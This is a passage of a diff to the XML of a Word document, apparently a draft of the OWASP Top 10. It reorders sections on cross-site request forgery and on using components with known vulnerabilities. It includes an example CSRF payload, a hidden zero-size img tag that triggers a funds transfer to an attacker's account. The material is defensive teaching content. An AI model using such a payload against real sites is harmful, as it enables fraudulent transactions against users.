+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">http://example.com/app/transferFunds?amount=1500&amp;destinationAccount=4673243243</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">So, the attacker constructs a request that will transfer money from the victim’s account to the attacker’s account, and then embeds this attack in an image request or iframe stored on various sites under the attacker’s control:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText"/>
+      </w:pPr>
+      <w:r>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">&lt;img src="</w:t>
+      </w:r>
+      <w:hyperlink r:id="rId97">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">http://example.com/app/transferFunds?amount=1500&amp;destinationAccount=attackersAcct#</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve">" width="0" height="0" /&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">If the victim visits any of the attacker’s sites while already authenticated to example.com, these forged requests will automatically include the user’s session info, authorizing the attacker’s request.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="97" w:name="how-do-i-prevent-6"/>
-      <w:bookmarkEnd w:id="97"/>
-      <w:r>
-        <w:t xml:space="preserve">How do I prevent</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">TBA</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="98" w:name="example-scenarios-6"/>
+      <w:bookmarkStart w:id="98" w:name="references-6"/>
       <w:bookmarkEnd w:id="98"/>
       <w:r>
-        <w:t xml:space="preserve">Example Scenarios</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">TBA</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="99" w:name="references-6"/>
+        <w:t xml:space="preserve">References</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="99" w:name="owasp-5"/>
       <w:bookmarkEnd w:id="99"/>
       <w:r>
-        <w:t xml:space="preserve">References</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="100" w:name="owasp-5"/>
-      <w:bookmarkEnd w:id="100"/>
-      <w:r>
         <w:t xml:space="preserve">OWASP</w:t>
       </w:r>
     </w:p>
@@ -5191,11 +5284,11 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1027"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId40">
+          <w:numId w:val="1028"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -5208,11 +5301,11 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1027"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId40">
+          <w:numId w:val="1028"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -5225,11 +5318,11 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1027"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId40">
+          <w:numId w:val="1028"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -5242,11 +5335,11 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1027"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId40">
+          <w:numId w:val="1028"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -5259,28 +5352,32 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="101" w:name="external-5"/>
+      <w:bookmarkStart w:id="100" w:name="external-5"/>
+      <w:bookmarkEnd w:id="100"/>
+      <w:r>
+        <w:t xml:space="preserve">External</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1029"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">CWE Entry 352 on CSRF</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="101" w:name="a9-using-compenents-with-known-vulnerabilities"/>
       <w:bookmarkEnd w:id="101"/>
       <w:r>
-        <w:t xml:space="preserve">External</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">TBA</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="102" w:name="a8-cross-site-request-forgery"/>
-      <w:bookmarkEnd w:id="102"/>
-      <w:r>
-        <w:t xml:space="preserve">A8 Cross site request forgery</w:t>
+        <w:t xml:space="preserve">A9 Using Compenents with Known Vulnerabilities</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -5527,10 +5624,10 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="103" w:name="am-i-vulnerable-to-csrf"/>
-      <w:bookmarkEnd w:id="103"/>
-      <w:r>
-        <w:t xml:space="preserve">Am I vulnerable to CSRF</w:t>
+      <w:bookmarkStart w:id="102" w:name="am-i-vulnerable-to-attack-6"/>
+      <w:bookmarkEnd w:id="102"/>
+      <w:r>
+        <w:t xml:space="preserve">Am I vulnerable to attack?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5538,161 +5635,250 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">To check whether an application is vulnerable, see if any links and forms lack an unpredictable CSRF token. Without such a token, attackers can forge malicious requests. An alternate defense is to require the user to prove they intended to submit the request, such as through reauthentication.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Focus on the links and forms that invoke state-changing functions, since those are the most important CSRF targets. Multistep transactions are not inherently immune. Also be aware that Server-Side Request Forgery (SSRF) is also possible by tricking apps and APIs into generating arbitrary HTTP requests.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Note that session cookies, source IP addresses, and other information automatically sent by the browser don’t defend against CSRF since they are included in the forged requests.</w:t>
-      </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">OWASP’s CSRF Tester tool can help generate test cases to demonstrate the dangers of CSRF flaws.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="104" w:name="how-do-i-prevent-7"/>
-      <w:bookmarkEnd w:id="104"/>
-      <w:r>
-        <w:t xml:space="preserve">How do I prevent</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">The preferred option is to use an existing CSRF defense. Many frameworks now include built in CSRF defenses, such as Spring, Play, Django, and AngularJS. Some web development languages, such as .NET do so as well. OWASP’s CSRF Guard can automatically add CSRF defenses to Java apps. OWASP’s CSRFProtector does the same for PHP or as an Apache filter.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Otherwise, preventing CSRF usually requires the inclusion of an unpredictable token in each HTTP request. Such tokens should, at a minimum, be unique per user session.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">The preferred option is to include the unique token in a hidden field. This includes the value in the body of the HTTP request, avoiding its exposure in the URL.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">The unique token can also be included in the URL or a parameter. However, this runs the risk that the token will be exposed to an attacker.</w:t>
-      </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Consider using the “SameSite=strict” flag on all cookies, which is increasingly supported in browsers.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="105" w:name="example-attack-scenarios"/>
-      <w:bookmarkEnd w:id="105"/>
-      <w:r>
-        <w:t xml:space="preserve">Example Attack Scenarios</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">The application allows a user to submit a state changing request that does not include anything secret. For example:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1028"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId40">
+        <w:t xml:space="preserve">The challenge is to continuously monitor the components (both client-side and server-side) you are using for new vulnerability reports. This monitoring can be very difficult because vulnerability reports are not standardized, making them hard to find and search for the details you need (e.g., the exact component in a product family that has the vulnerability). Worst of all, many vulnerabilities never get reported to central clearinghouses like</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t xml:space="preserve">http://example.com/app/transferFunds?amount=1500&amp;destinationAccount=4673243243</w:t>
+          <w:t xml:space="preserve">CVE</w:t>
         </w:r>
       </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">and</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId38">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">NVD</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve">.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Determining if you are vulnerable requires searching these databases, as well as keeping abreast of project mailing lists and announcements for anything that might be a vulnerability. This process can be done manually, or with automated tools. If a vulnerability in a component is discovered, carefully evaluate whether you are actually vulnerable. Check to see if your code uses the vulnerable part of the component and whether the flaw could result in an impact you care about. Both checks can be difficult to perform as vulnerability reports can be deliberately vague.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="103" w:name="how-do-i-prevent-7"/>
+      <w:bookmarkEnd w:id="103"/>
+      <w:r>
+        <w:t xml:space="preserve">How do I prevent</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">So, the attacker constructs a request that will transfer money from the victim’s account to the attacker’s account, and then embeds this attack in an image request or iframe stored on various sites under the attacker’s control:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">&lt;img src="</w:t>
+        <w:t xml:space="preserve">Most component projects do not create vulnerability patches for old versions. So the only way to fix the problem is to upgrade to the next version, which can require other code changes. Software projects should have a process in place to:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1030"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Continuously inventory the versions of both client-side and server-side components and their dependencies using tools like</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId104">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">versions</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve">,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId105">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">DependencyCheck</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve">,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:hyperlink r:id="rId106">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t xml:space="preserve">http://example.com/app/transferFunds?amount=1500&amp;destinationAccount=attackersAcct#</w:t>
+          <w:t xml:space="preserve">retire.js</w:t>
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve">" width="0" height="0" /&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">If the victim visits any of the attacker’s sites while already authenticated to example.com, these forged requests will automatically include the user’s session info, authorizing the attacker’s request.</w:t>
+        <w:t xml:space="preserve">, etc.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1030"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Continuously monitor sources like</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId107">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">National Vulnerability Database (NVD)</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">for vulnerabilities in your components. Use software composition analysis tools to automate the process.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1030"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Analyze libraries to be sure they are actually invoked at runtime before making changes, as the majority of components are never loaded or invoked.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1030"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Decide whether to upgrade component (and rewrite application to match if needed) or deploy a</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId108">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">virtual patch</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">that analyzes HTTP traffic, data flow, or code execution and prevents vulnerabilities from being exploited.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="107" w:name="references-7"/>
-      <w:bookmarkEnd w:id="107"/>
+      <w:bookmarkStart w:id="109" w:name="example-scenarios-6"/>
+      <w:bookmarkEnd w:id="109"/>
+      <w:r>
+        <w:t xml:space="preserve">Example Scenarios</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Components almost always run with the full privilege of the application, so flaws in any component can result in serious impact. Such flaws can be accidental (e.g., coding error) or intentional (e.g., backdoor in component). Some example exploitable component vulnerabilities discovered are:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1031"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Apache CXF Authentication Bypass – By failing to provide an identity token, attackers could invoke any web service with full permission. (Apache CXF is a services framework, not to be confused with the Apache Application Server.)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1031"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Struts 2 Remote Code Execution – Sending an attack in the Content-Type header causes the content of that header to be evaluated as an OGNL expression, which enables execution of arbitrary code on the server.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1031"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Applications using a vulnerable version of either component are susceptible to attack as both components are directly accessible by application users. Other vulnerable libraries, used deeper in an application, may be harder to exploit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="110" w:name="references-7"/>
+      <w:bookmarkEnd w:id="110"/>
       <w:r>
         <w:t xml:space="preserve">References</w:t>
       </w:r>
@@ -5701,8 +5887,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="108" w:name="owasp-6"/>
-      <w:bookmarkEnd w:id="108"/>
+      <w:bookmarkStart w:id="111" w:name="owasp-6"/>
+      <w:bookmarkEnd w:id="111"/>
       <w:r>
         <w:t xml:space="preserve">OWASP</w:t>
       </w:r>
@@ -5711,11 +5897,11 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1029"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId40">
+          <w:numId w:val="1032"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -5728,11 +5914,11 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1029"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId40">
+          <w:numId w:val="1032"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -5745,11 +5931,11 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1029"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId40">
+          <w:numId w:val="1032"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -5762,11 +5948,11 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1029"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId40">
+          <w:numId w:val="1032"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -5777,10 +5963,42 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="109" w:name="external-6"/>
-      <w:bookmarkEnd w:id="109"/>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1032"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId105">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">OWASP Dependency Check (for Java and .NET libraries)</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1032"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId112">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">OWASP Virtual Patching Best Practices</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
       <w:r>
         <w:t xml:space="preserve">External</w:t>
       </w:r>
@@ -5789,22 +6007,112 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1030"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">CWE Entry 352 on CSRF</w:t>
-      </w:r>
+          <w:numId w:val="1033"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId113">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">The Unfortunate Reality of Insecure Libraries</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1033"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId114">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">MITRE Common Vulnerabilities and Exposures (CVE) search</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1033"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId107">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">National Vulnerability Database (NVD)</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1033"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId106">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">Retire.js for detecting known vulnerable JavaScript libraries</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1033"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId115">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">Node Libraries Security Advisories</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1033"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId116">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">Ruby Libraries Security Advisory Database and Tools</w:t>
+        </w:r>
+      </w:hyperlink>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="110" w:name="a9-using-compenents-with-known-vulnerabilities"/>
-      <w:bookmarkEnd w:id="110"/>
-      <w:r>
-        <w:t xml:space="preserve">A9 Using Compenents with Known Vulnerabilities</w:t>
+      <w:bookmarkStart w:id="117" w:name="axx-deserialization-of-untrusted-data"/>
+      <w:bookmarkEnd w:id="117"/>
+      <w:r>
+        <w:t xml:space="preserve">AXX Deserialization of untrusted data</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -6051,8 +6359,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="111" w:name="am-i-vulnerable-to-attack-7"/>
-      <w:bookmarkEnd w:id="111"/>
+      <w:bookmarkStart w:id="118" w:name="am-i-vulnerable-to-attack-7"/>
+      <w:bookmarkEnd w:id="118"/>
       <w:r>
         <w:t xml:space="preserve">Am I vulnerable to attack?</w:t>
       </w:r>
@@ -6062,38 +6370,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">The challenge is to continuously monitor the components (both client-side and server-side) you are using for new vulnerability reports. This monitoring can be very difficult because vulnerability reports are not standardized, making them hard to find and search for the details you need (e.g., the exact component in a product family that has the vulnerability). Worst of all, many vulnerabilities never get reported to central clearinghouses like</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId40">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve">CVE</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">and</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId40">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve">NVD</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve">.</w:t>
